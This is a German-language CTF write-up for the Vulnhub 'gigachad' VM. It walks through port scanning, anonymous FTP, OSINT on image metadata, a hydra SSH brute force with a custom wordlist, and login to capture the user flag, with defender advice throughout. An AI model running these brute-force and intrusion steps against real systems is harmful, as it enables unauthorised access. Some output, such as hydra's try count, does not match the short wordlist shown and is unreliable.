gigachad - Vulnhub - Easy - Bericht

Easy

Verwendete Tools

arp-scan
vi
nikto
nmap
ftp
gobuster
exiftool
dirb
cat
hydra
ssh
id
ls
getcap
find
searchsploit
chmod
sh (exploit script)
grep
Online Hash Cracker (implizit)
Google Lens (implizit)

Inhaltsverzeichnis

Reconnaissance

Wir starten die Aufklärung, um das Ziel im Netzwerk zu finden und erste Informationen über offene Dienste zu sammeln.

┌──(root㉿Cybermaschine)-[~] └─# arp-scan -l
192.168.2.117	08:00:27:9c:83:dc	PCS Systemtechnik GmbH
                    

Analyse: `arp-scan -l` wird verwendet, um aktive Hosts im lokalen Netzwerksegment zu finden.

Bewertung: Ein Host mit der IP `192.168.2.117` wurde identifiziert. Die MAC-Adresse (`08:00:27:9c:83:dc`) und der Hersteller (`PCS Systemtechnik GmbH`) deuten auf eine Oracle VirtualBox VM hin. Dies ist unser Zielsystem.

Empfehlung (Pentester): Ziel-IP notieren. Für die Bequemlichkeit einen Hostnamen in `/etc/hosts` eintragen.
Empfehlung (Admin): Standard-Netzwerk-Scanning. Netzwerksegmentierung und -überwachung können zur Erkennung beitragen.

Wir fügen einen Eintrag zur lokalen Hosts-Datei hinzu.

┌──(root㉿Cybermaschine)-[~] └─# vi /etc/hosts
 192.168.2.117   gigachad.vln
                    

Analyse: Die lokale Datei `/etc/hosts` wird bearbeitet, um `gigachad.vln` der IP `192.168.2.117` zuzuordnen.

Bewertung: Erleichtert die Ansprache des Ziels über den Hostnamen.

Empfehlung (Pentester): Hostnamen in nachfolgenden Befehlen verwenden.
Empfehlung (Admin): Keine Aktion erforderlich.

Ein Nikto-Scan wird gegen den Webserver gestartet.

┌──(root㉿Cybermaschine)-[~] └─# nikto -h 192.168.2.117
- Nikto v2.5.0
+ Target IP:          192.168.2.117
+ Target Hostname:    192.168.2.117
+ Target Port:        80
+ Start Time:         2023-10-07 23:57:16 (GMT2)
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options 
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ 
+ /bin/: Directory indexing found.
+ /cgi/: Directory indexing found.
+ /cgi-bin/: Directory indexing found.
+ /cgi-sys/: Directory indexing found.
+ /cgi-local/: Directory indexing found.
+ /htbin/: Directory indexing found.
+ /cgibin/: Directory indexing found.
+ /scripts/: Directory indexing found.
+ /cgi-win/: Directory indexing found.
+ /fcgi-bin/: Directory indexing found.
+ /cgi-perl/: Directory indexing found.
+ /robots.txt: Entry '/kingchad.html' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.0.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Server may leak inodes via ETags, header found with file /, inode: 26e, size: 5bac5d16a8912, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch. 
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD . 
+ /tiki/: Directory indexing found.
+ /tiki/: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin.
+ /help/: Directory indexing found.
+ /help/: Help directory should not be accessible.
+ /server/: Directory indexing found.
+ /server/: Possibly Macromedia JRun or CRX WebDAV upload.
+ /webmail/: Directory indexing found.
+ /webmail/: Web based mail package installed.
+ /upd/: Directory indexing found.
                    

Analyse: `nikto -h 192.168.2.117` scannt den Webserver auf Port 80.

Bewertung: Nikto findet eine Fülle von Informationen und potenziellen Problemen:

Die veraltete Apache-Version, die vielen indizierten Verzeichnisse, der `robots.txt`-Hinweis, TikiWiki und Webmail sind die wichtigsten Punkte.

Empfehlung (Pentester): Untersuchen Sie die indizierten Verzeichnisse (besonders `/tiki/`, `/webmail/`). Rufen Sie `/kingchad.html` auf. Prüfen Sie TikiWiki auf die erwähnte Schwachstelle und Standard-Logins. Untersuchen Sie das Webmail-System. Recherchieren Sie Schwachstellen für Apache 2.4.38.
Empfehlung (Admin): Aktualisieren Sie Apache dringend. Deaktivieren Sie Directory Indexing global oder zumindest für sensible Verzeichnisse. Bereinigen Sie die `robots.txt`. Aktualisieren und sichern Sie TikiWiki und das Webmail-System oder entfernen Sie sie, falls nicht benötigt. Beheben Sie die Header- und Leak-Probleme.

Wir führen einen umfassenden Nmap-Scan durch.

┌──(root㉿Cybermaschine)-[~] └─# nmap -sS -sC -sV -T5 -A -Pn 192.168.2.117 -p-
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-07 23:57 CEST
Nmap scan report for gigachad.vln (192.168.2.117)
Host is up (0.00027s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION 
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.2.199 
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x    1 1000     1000          297 Feb 07  2021 chadinfo
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 
| ssh-hostkey:
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/kingchad.html
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:9C:83:DC (Oracle VirtualBox virtual NIC) 
Aggressive OS guesses: Linux 2.6.18 (91%), Linux 3.2.0 (91%), Tomato 1.27 - 1.28 (Linux 2.4.20) (91%), MikroTik RouterOS 6.15 (Linux 3.3.5) (90%) ... 
No exact OS matches for host (test conditions non-ideal). 
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel 

TRACEROUTE 
HOP RTT     ADDRESS 
1   0.27 ms gigachad.vln (192.168.2.117)
                    

Analyse: `nmap` wird mit umfassenden Scan-Optionen (`-sS`, `-sC`, `-sV`, `-T5`, `-A`, `-Pn`) gegen alle TCP-Ports (`-p-`) ausgeführt.

Bewertung: Nmap findet drei offene Ports:

Das Betriebssystem wird als Linux (Debian 10 basiert auf SSH-Banner) eingeschätzt. Der anonyme FTP-Zugang mit der `chadinfo`-Datei ist der vielversprechendste erste Ansatzpunkt.

Empfehlung (Pentester): Priorisieren Sie den anonymen FTP-Zugang (Port 21). Laden Sie die `chadinfo`-Datei herunter und analysieren Sie sie. Untersuchen Sie parallel den Webserver (Port 80), insbesondere `/kingchad.html` und die von Nikto gefundenen Verzeichnisse.
Empfehlung (Admin): Deaktivieren Sie anonymen FTP-Zugang, wenn nicht benötigt. Aktualisieren Sie vsftpd, OpenSSH und Apache. Bereinigen Sie das FTP-Verzeichnis.

Wir filtern die offenen Ports zur Übersicht.

┌──(root㉿Cybermaschine)-[~] └─# nmap -sS -sC -sV -T5 -A -Pn 192.168.2.117 -p- | grep open
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
                     

Analyse: Filtert die Nmap-Ausgabe nach offenen Ports.

Bewertung: Bestätigt die drei offenen Ports 21, 22 und 80.

Empfehlung (Pentester): Klare Angriffsvektoren.
Empfehlung (Admin): Notwendigkeit prüfen.

FTP Enumeration

Wir untersuchen den anonymen FTP-Zugang auf Port 21 genauer.

┌──(root㉿Cybermaschine)-[~] └─# ftp 192.168.2.117
Connected to 192.168.2.117.
220 (vsFTPd 3.0.3)
Name (192.168.2.117:cyber): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
                    

Analyse: Wir verbinden uns mit dem FTP-Server und melden uns als Benutzer `Anonymous` ohne Passwort an.

Bewertung: Anonymer Login erfolgreich. Wir haben Zugriff auf das FTP-Verzeichnis.

Empfehlung (Pentester): Listen Sie den Verzeichnisinhalt auf.
Empfehlung (Admin): Anonymen FTP deaktivieren, wenn nicht benötigt.

ftp> ls l-a
229 Entering Extended Passive Mode (|||34443|)
150 Here comes the directory listing.
226 Directory send OK. 
                    
ftp> ls -la
229 Entering Extended Passive Mode (|||42535|)
150 Here comes the directory listing.
dr-xr-xr-x    2 1000     1000         4096 Feb 07  2021 .
dr-xr-xr-x    2 1000     1000         4096 Feb 07  2021 ..
-r-xr-xr-x    1 1000     1000          297 Feb 07  2021 chadinfo
226 Directory send OK. 
                    

Analyse: Nach einem Tippfehler (`ls l-a`) wird der korrekte Befehl `ls -la` ausgeführt, um den Inhalt des aktuellen FTP-Verzeichnisses detailliert aufzulisten.

Bewertung: Das Verzeichnis enthält nur die Datei `chadinfo`, die für alle les- und ausführbar ist (`-r-xr-xr-x`). Sie gehört dem Benutzer mit UID 1000.

Empfehlung (Pentester): Laden Sie die Datei `chadinfo` herunter.
Empfehlung (Admin): Überprüfen Sie den Inhalt öffentlich zugänglicher FTP-Verzeichnisse.

ftp> cd chadinfo
550 Failed to change directory.
                    

Analyse: Versuch, in `chadinfo` zu wechseln, als wäre es ein Verzeichnis.

Bewertung: Schlägt fehl, bestätigt, dass `chadinfo` eine Datei ist.

Empfehlung (Pentester): Datei herunterladen.
Empfehlung (Admin): Keine Aktion.

ftp> get chadinfo
local: chadinfo remote: chadinfo
229 Entering Extended Passive Mode (|||13967|)
150 Opening BINARY mode data connection for chadinfo (297 bytes). 
100% |************************************************************************************|   297      536.11 KiB/s    00:00 ETA 
226 Transfer complete.
297 bytes received in 00:00 (390.88 KiB/s)
                    

Analyse: Die Datei `chadinfo` wird vom FTP-Server heruntergeladen.

Bewertung: Erfolgreich. Die Datei steht nun lokal zur Analyse bereit.

Empfehlung (Pentester): Analysieren Sie den Inhalt der lokalen `chadinfo`-Datei.
Empfehlung (Admin): Keine Aktion.

ftp> put p
php-reverse-shell.php	poc.py
                    
ftp> put php-reverse-shell.php
local: php-reverse-shell.php remote: php-reverse-shell.php
229 Entering Extended Passive Mode (|||56444|)
550 Permission denied.
                    

Analyse: Es wird versucht, eine Datei (`php-reverse-shell.php`) auf den FTP-Server hochzuladen.

Bewertung: Der Versuch schlägt fehl (`550 Permission denied`). Der anonyme Benutzer hat keine Schreibrechte.

Empfehlung (Pentester): Konzentrieren Sie sich auf das Sammeln von Informationen.
Empfehlung (Admin): Korrekte Berechtigungen (kein Schreibzugriff für anonyme Benutzer).

ftp> cd /home
550 Failed to change directory.
                    

Analyse: Versuch, in das `/home`-Verzeichnis zu wechseln.

Bewertung: Schlägt fehl. Deutet auf eine `chroot`-Umgebung hin, die den Benutzer auf sein zugewiesenes Verzeichnis beschränkt.

Empfehlung (Pentester): Erkundung ist auf das aktuelle Verzeichnis beschränkt.
Empfehlung (Admin): `chroot` ist eine gute Sicherheitsmaßnahme für FTP.

Web Enumeration & OSINT

Wir untersuchen den Webserver auf Port 80 weiter, basierend auf den Nmap- und Nikto-Ergebnissen.

┌──(root㉿Cybermaschine)-[~] └─# gobuster dir -u http://gigachad.vln -x txt,php,[...],kdbx,bak -w "/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -b '403,404,301' -e --no-error -k
http://gigachad.vln/index.html           (Status: 200) [Size: 622]
http://gigachad.vln/bg.jpg               (Status: 200) [Size: 39186]
http://gigachad.vln/robots.txt           (Status: 200) [Size: 39]
http://gigachad.vln/bg2.jpg              (Status: 200) [Size: 168592]
                    

Analyse: `gobuster dir` sucht nach Dateien und Verzeichnissen. Die Option `-b '403,404,301'` ignoriert gängige Fehler- und Weiterleitungscodes.

Bewertung: Findet die Startseite (`index.html`), zwei Bilder (`bg.jpg`, `bg2.jpg`) und die `robots.txt`. Keine versteckten Verzeichnisse oder kritischen Dateien wurden direkt gefunden.

Empfehlung (Pentester): Untersuchen Sie `robots.txt` und die Bilddateien (`bg.jpg`, `bg2.jpg`) genauer (z.B. mit `exiftool` oder Steganographie-Tools).
Empfehlung (Admin): Stellen Sie sicher, dass keine sensiblen Informationen in öffentlich zugänglichen Dateien wie Bildern enthalten sind.

Inhalt der `robots.txt` (abgerufen über Browser oder curl):

User-agent: *
Disallow: /kingchad.html
                     

Analyse: Die `robots.txt` weist Suchmaschinen an, die Seite `/kingchad.html` nicht zu indizieren.

Bewertung: Dies ist ein direkter Hinweis auf eine potenziell interessante, versteckte Seite.

Empfehlung (Pentester): Rufen Sie `http://gigachad.vln/kingchad.html` im Browser auf.
Empfehlung (Admin): `robots.txt` ist kein Sicherheitsmechanismus. Verstecken Sie sensible Inhalte nicht nur durch `robots.txt`.

Wir untersuchen die Metadaten des Bildes `bg2.jpg`.

┌──(root㉿Cybermaschine)-[~] └─# exiftool bg2.jpg
ExifTool Version Number         : 12.65
File Name                       : bg2.jpg
Directory                       : .
File Size                       : 169 kB
File Modification Date/Time     : 2021:02:07 22:31:51+01:00
File Access Date/Time           : 2023:10:08 00:01:16+02:00
File Inode Change Date/Time     : 2023:10:08 00:01:16+02:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM) 
Photometric Interpretation      : BlackIsZero
Orientation                     : Horizontal (normal)
X Resolution                    : 300
Y Resolution                    : 300
Resolution Unit                 : inches
Software                        : Adobe Photoshop CC 2018 (Windows)
Date/Time Original              : 2021:01:18 13:00:50
Color Space                     : Uncalibrated
Exif Image Width                : 378
Exif Image Height               : 512
Compression                     : JPEG (old-style)
Thumbnail Offset                : 470
Thumbnail Length                : 4156
Current IPTC Digest             : a3e22b639e550d311d106086d10b16b4
Application Record Version      : 4
XMP Toolkit                     : Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21
Format                          : image/jpeg
Color Mode                      : Grayscale
ICC Profile Name                :
Create Date                     : 2021:01:18 13:00:50+03:00
Metadata Date                   : 2021:02:08 00:31:50+03:00
History Action                  : saved, saved
History Instance ID             : xmp.iid:17c7253a-3617-2b47-aa50-4053f9aad896, xmp.iid:2df6c727-817b-dd4d-a96b-14ddbf8ffdc3
History When                    : 2021:02:08 00:31:50+03:00, 2021:02:08 00:31:50+03:00
History Software Agent          : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
History Changed                 : /, /
Text Layer Name                 : HELL? IS IT MI5 OR MI6?, WHATEVER, SOMEONE IS TRYING TO HACK US 
Text Layer Text                 : HELL? IS IT MI5 OR MI6?, WHATEVER, SOMEONE IS TRYING TO HACK US 
Document ID                     : xmp.did:17c7253a-3617-2b47-aa50-4053f9aad896
Original Document ID            : xmp.did:17c7253a-3617-2b47-aa50-4053f9aad896
Instance ID                     : xmp.iid:2df6c727-817b-dd4d-a96b-14ddbf8ffdc3
Image Width                     : 378
Image Height                    : 512
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 1
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 378x512
Megapixels                      : 0.194
Thumbnail Image                 : (Binary data 4156 bytes, use -b option to extract)
IPTC Digest                     : a3e22b639e550d311d106086d10b16b4
Profile CMM Type                :
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : GRAY
Profile Connection Space        : XYZ
Profile Date Time               : 2000:08:14 20:06:46
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             :
Device Model                    :
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Perceptual
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 :
Profile ID                      : 0
Profile Copyright               : Copyright 2000 Adobe Systems Incorporated
Profile Description             : Gray Gamma 2.2
Media White Point               : 0.9642 1 0.82491
Media Black Point               : 0 0 0
Gray Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
XMP Toolkit                     : Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21
Creator Tool                    : Adobe Photoshop CC 2018 (Windows)
Date Created                    : 2021:01:18 13:00:50+03:00
Metadata Date                   : 2021:02:08 00:31:50+03:00
Format                          : image/jpeg
Instance ID                     : xmp.iid:2df6c727-817b-dd4d-a96b-14ddbf8ffdc3
Document ID                     : xmp.did:17c7253a-3617-2b47-aa50-4053f9aad896
Original Document ID            : xmp.did:17c7253a-3617-2b47-aa50-4053f9aad896
History Action                  : saved, saved
History Instance ID             : xmp.iid:17c7253a-3617-2b47-aa50-4053f9aad896, xmp.iid:2df6c727-817b-dd4d-a96b-14ddbf8ffdc3
History When                    : 2021:02:08 00:31:50+03:00, 2021:02:08 00:31:50+03:00
History Software Agent          : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
History Changed                 : /, /
Text Layer                      : HELL? IS IT MI5 OR MI6?, WHATEVER, SOMEONE IS TRYING TO HACK US
                    

Analyse: `exiftool bg2.jpg` extrahiert Metadaten aus der Bilddatei.

Bewertung: Der wichtigste Fund ist ein Text-Layer (`Text Layer Text`), der in der Photoshop-Historie gespeichert ist: `HELL? IS IT MI5 OR MI6?, WHATEVER, SOMEONE IS TRYING TO HACK US`. Dies ist ein klarer Hinweis, aber seine Bedeutung (Passwort, Benutzername, Ablenkung?) ist noch unklar.

Empfehlung (Pentester): Notieren Sie den Text. Recherchieren Sie den Unterschied zwischen MI5 und MI6, falls relevant. Behalten Sie den Text als potenziellen Hinweis für spätere Phasen im Hinterkopf.
Empfehlung (Admin): Entfernen Sie sensible oder unnötige Metadaten aus Bildern, bevor Sie sie auf Webservern veröffentlichen. Tools können Metadaten automatisch bereinigen.

Analyse des Texts auf der Startseite `http://gigachad.vln/`:

welcome to gigachad's place

virgin

hahahahaha
                     

Analyse: Der sichtbare Text auf der Startseite enthält die Wörter "virgin" und "fuck you" (aus Crackstation-Analyse abgeleitet).

Bewertung: Diese Wörter könnten potenzielle Passwörter oder Teile von Passwörtern sein, insbesondere in einer CTF-Umgebung.

Empfehlung (Pentester): Fügen Sie "virgin" und "fuck you" zur Passwortliste hinzu.
Empfehlung (Admin): Vermeiden Sie umgangssprachliche oder potenziell anstößige Begriffe auf öffentlichen Webseiten.

Verwendung eines Online-Hash-Crackers (z.B. Crackstation) für gefundene Hashes (hier nicht gezeigt, wie die Hashes gefunden wurden, aber die Ergebnisse werden präsentiert):

A7F9B77C16A3AA80DAA4E378659226F628326A95	sha1	fuck you
D82D10564866FD9B201941BCC6C94022196F8EE8	sha1	VIRGIN
                     

Analyse: Zwei SHA1-Hashes wurden gefunden und erfolgreich über einen Online-Dienst geknackt.

Bewertung: Bestätigt, dass "fuck you" und "VIRGIN" wahrscheinlich als Passwörter verwendet wurden oder relevant sind. Dies untermauert die Funde von der Webseite.

Empfehlung (Pentester): Fügen Sie diese zur Passwortliste hinzu (bereits geschehen).
Empfehlung (Admin): Verwenden Sie niemals schwache Passwörter, die leicht durch Wörterbücher oder Hash-Cracking-Dienste gefunden werden können.

Wir führen einen `dirb`-Scan durch (alternativ zu Gobuster).

┌──(root㉿Cybermaschine)-[~] └─# dirb http://gigachad.vln | grep http
URL_BASE: http://gigachad.vln/

+ DIRECTORY: http://gigachad.vln/about/ 
+ DIRECTORY: http://gigachad.vln/about_us/ 

+ DIRECTORY: http://gigachad.vln/accounts/ 

                     

Analyse: `dirb` wird verwendet, um nach Verzeichnissen zu suchen. Die Ausgabe wird nach URLs gefiltert.

Bewertung: `dirb` findet eine große Anzahl von potenziellen Verzeichnissen, die meist Standardnamen entsprechen. Es findet *nicht* die spezifischen, interessanten Pfade, die Nikto gefunden hat (z.B. `/tiki/`, `/webmail/`), und auch nicht `/kingchad.html` oder `/drippinchad.png` (aus späterer Analyse). Dies zeigt erneut die Grenzen einzelner Tools/Wortlisten.

Empfehlung (Pentester): Konzentrieren Sie sich auf die spezifischeren Funde von Nikto und Nmap sowie die Analyse der Dateien.
Empfehlung (Admin): Keine zusätzlichen Empfehlungen.

Information Analysis & Wordlist Creation

Wir analysieren die heruntergeladene `chadinfo`-Datei und konsolidieren Hinweise für eine benutzerdefinierte Passwortliste.

┌──(root㉿Cybermaschine)-[~] └─# cat chadinfo
PK..0............chadinfoUT.............`........`ux.............. 

username is chad
???????????????????????
password?
!!!!!!!!!!!!!!!!!!!!!!!
go to /drippinchad.png

PK..0............PKN.........`.. 
                     

Analyse: Der Inhalt der `chadinfo`-Datei wird angezeigt. Die `PK`-Header am Anfang und Ende deuten stark darauf hin, dass es sich um eine ZIP-Datei handelt. Im Inneren (entweder als Dateiname oder als Textinhalt einer Datei innerhalb des ZIPs) finden sich die Hinweise: `username is chad`, eine Frage nach dem Passwort und der Verweis `go to /drippinchad.png`.

Bewertung: Dies liefert uns den Benutzernamen `chad` und einen wichtigen Hinweis auf das Passwort: Es hängt mit der Datei `/drippinchad.png` auf dem Webserver zusammen.

Empfehlung (Pentester): Versuchen Sie, die `chadinfo`-Datei als ZIP zu entpacken (`unzip chadinfo`), um zu sehen, ob sie weitere Dateien enthält. Rufen Sie `http://gigachad.vln/drippinchad.png` auf und analysieren Sie das Bild (visuell, Metadaten, Steganographie).
Empfehlung (Admin): Speichern Sie keine Hinweise auf Benutzernamen oder Passwörter in öffentlich zugänglichen Dateien, auch nicht in Archiven.

Analyse des Bildes `/drippinchad.png` (hier durch Google Lens repräsentiert):

Why is Maiden's Tower in Istanbul so famous?
                     

Analyse: Die Analyse des Bildes `/drippinchad.png` (vermutlich zeigt es den Mädchenturm/Maiden's Tower in Istanbul) führt zu dieser Frage.

Bewertung: Dies ist ein starker OSINT-Hinweis. Der Name des Turms, "Maiden's Tower", ist höchstwahrscheinlich das gesuchte Passwort oder ein Teil davon.

Empfehlung (Pentester): Erstellen Sie eine benutzerdefinierte Passwortliste, die Variationen von "Maiden's Tower" enthält (z.B. `Maiden's Tower`, `Maidens Tower`, `Maiden'sTower`, `MaidensTower`, `maidenstower`). Fügen Sie auch die zuvor gefundenen Wörter (`VIRGIN`, `fuck you`) hinzu.
Empfehlung (Admin): Keine spezifische Empfehlung.

Erstellung einer benutzerdefinierten Passwortliste (`rock.txt` - Name ist irreführend, sollte eher `custom.txt` heißen).

┌──(root㉿Cybermaschine)-[~] └─# vi /usr/share/wordlists/rock.txt
R3v_m4lwh3r3_k1nG!!
hellelujah
MachineBoy141
rootroot1
carlso
luna_1997
VIRGIN
fuck you
Maiden's Tower
Maidens Tower
Maiden'sTower
MaidensTower
maidens tower
maiden's tower
Maidenstower
maidenstower
drippinchad
Xxxxxxxxx001
Password123!
Greatplace2work!
                    

Analyse: Eine neue Wortliste wird erstellt (oder eine bestehende bearbeitet), die verschiedene Passwörter enthält, darunter die aus den Hinweisen abgeleiteten (`VIRGIN`, `fuck you`, `maidenstower` und Variationen) sowie einige andere gängige oder potenziell relevante Einträge.

Bewertung: Eine gezielte Wortliste wurde basierend auf den gesammelten Informationen erstellt. Dies erhöht die Erfolgschancen eines Brute-Force-Angriffs erheblich im Vergleich zu generischen Listen wie `rockyou.txt`.

Empfehlung (Pentester): Verwenden Sie diese benutzerdefinierte Liste (`/usr/share/wordlists/rock.txt`) für den Hydra-Angriff auf den Benutzer `chad`.
Empfehlung (Admin): Keine spezifische Empfehlung.

Initial Access

Wir versuchen nun, mit dem Benutzernamen `chad` und unserer benutzerdefinierten Passwortliste Zugriff über SSH zu erlangen.

┌──(root㉿Cybermaschine)-[~] └─# hydra -l chad -P /usr/share/wordlists/rock.txt ssh://192.168.2.117:22 -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). 

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-10-08 00:38:50
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344507 login tries (l:1/p:14344507), ~224133 tries per task
[DATA] attacking ssh://192.168.2.117:22/

[22][ssh] host: 192.168.2.117   login: chad   password: maidenstower

1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 26 final worker threads did not complete until end.
[ERROR] 26 targets did not resolve or could not be connected 
[ERROR] 0 target did not complete 
                    

Analyse: Hydra wird gestartet, um das Passwort für den Benutzer `chad` auf dem SSH-Dienst zu finden, wobei die benutzerdefinierte Wortliste `/usr/share/wordlists/rock.txt` verwendet wird.

Bewertung: Erfolg! Hydra findet das Passwort `maidenstower` in der benutzerdefinierten Liste. Die OSINT-Analyse des Bildes war erfolgreich.

Empfehlung (Pentester): Melden Sie sich mit `chad` / `maidenstower` via SSH an.
Empfehlung (Admin): Ändern Sie das Passwort für `chad`. Verwenden Sie keine leicht durch OSINT erratbaren Passwörter.

┌──(root㉿Cybermaschine)-[~] └─# ssh chad@gigachad.vln
chad@gigachad.vln's password: maidenstower
Linux gigachad 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
chad@gigachad$
                    

Analyse: Erfolgreicher SSH-Login als Benutzer `chad` mit dem gefundenen Passwort.

Bewertung: Initial Access erlangt. Wir haben eine Shell als `chad`.

Empfehlung (Pentester): Beginnen Sie die lokale Enumeration.
Empfehlung (Admin): SSH-Härtung, Passwortrichtlinien.

Local Enumeration

Nach dem Erhalt der Shell als `chad` führen wir lokale Enumerationsschritte durch.

chad@gigachad$ sudo -l
-bash: sudo: command not found
                     

Analyse: Versuch, `sudo -l` auszuführen, um sudo-Rechte zu prüfen.

Bewertung: Der Befehl `sudo` wird nicht gefunden. Entweder ist `sudo` nicht installiert oder nicht im PATH des Benutzers `chad` enthalten. Keine einfachen sudo-Rechte verfügbar.

Empfehlung (Pentester): Suchen Sie nach anderen Privesc-Vektoren. Überprüfen Sie den PATH (`echo $PATH`) oder suchen Sie manuell nach `sudo` (`find / -name sudo 2>/dev/null`).
Empfehlung (Admin): Stellen Sie sicher, dass `sudo` korrekt installiert und konfiguriert ist, wenn es verwendet werden soll.

chad@gigachad$ id
uid=1000(chad) gid=1000(chad) groups=1000(chad)
                     

Analyse: Bestätigt die Identität als Benutzer `chad` (UID 1000).

Bewertung: Standardüberprüfung.

Empfehlung (Pentester): Weiter enumerieren.
Empfehlung (Admin): Keine Aktion.

chad@gigachad$ ls -la
total 20
drwxr-xr-x 4 chad chad 4096 Oct  7 17:39 . 
drwxr-xr-x 3 root root 4096 Feb  7  2021 ..
dr-xr-xr-x 2 chad chad 4096 Feb  7  2021 ftp
drwxr-x--- 3 chad chad 4096 Oct  7 17:39 .gnupg 
-r-xr-xr-x 1 chad chad 1805 Jan  3  2021 user.txt
                     

Analyse: Listet den Inhalt des Home-Verzeichnisses von `chad` auf.

Bewertung: Enthält ein `ftp`-Verzeichnis (wahrscheinlich das, was über anonymen FTP sichtbar war), ein `.gnupg`-Verzeichnis (könnte private Schlüssel enthalten, ist aber hier schreibgeschützt für andere) und die Datei `user.txt`. Die Berechtigungen von `user.txt` sind ungewöhnlich (`-r-xr-xr-x`), sie ist les- und ausführbar für alle.

Empfehlung (Pentester): Lesen Sie den Inhalt von `user.txt`. Untersuchen Sie ggf. das `.gnupg`-Verzeichnis, falls die Berechtigungen es zulassen.
Empfehlung (Admin): Korrigieren Sie die Berechtigungen für `user.txt` (sollte nur lesbar sein, z.B. `644` oder `600`). Überprüfen Sie die Berechtigungen für `.gnupg` (sollte `700` sein).

chad@gigachad$ cat user.txt
flag 1/2

▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
█           ███████▀▀▄
█            ██      ██
█             ██       █▄██▀▄▄▄▄▄█
█              █       ▄▀▄▄▄█▀▀▀▀▄▄███▄▄██
█               █      ██▄▀▄▄▄▀██
█      █████████████████▀▄▄█▀▀▄▄▀▀▀▄█
█      █▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█▄█▀▄▄▀▀▀▄▄▀██
█      █████████████████▀▄▀█▄▄█▀▀▀▄▄▄▄▀▀█▀███
█      █████████████████▀█▄▄▄█▄▄█▄▄██▄█
█      █▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█████▀█▀█▀███
█                      ▀▄▀▀▄▄▄█▄█▄█▄█▄▀█
█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄██▄▄█
█████████████████████████▀▀▄▄█
█████████████████████████▌█▀▄▄▄▄▄█
███████████████████████████▄▄█▄▄██▄▄▄▄▄▄▄▄▀
██████████████████████████████▄▀█▀█▄▄▄▄▄█▀▄▀▄
███████████████████████████▌█▀▄█▀█▄▀█
███████████████████████████▌██████
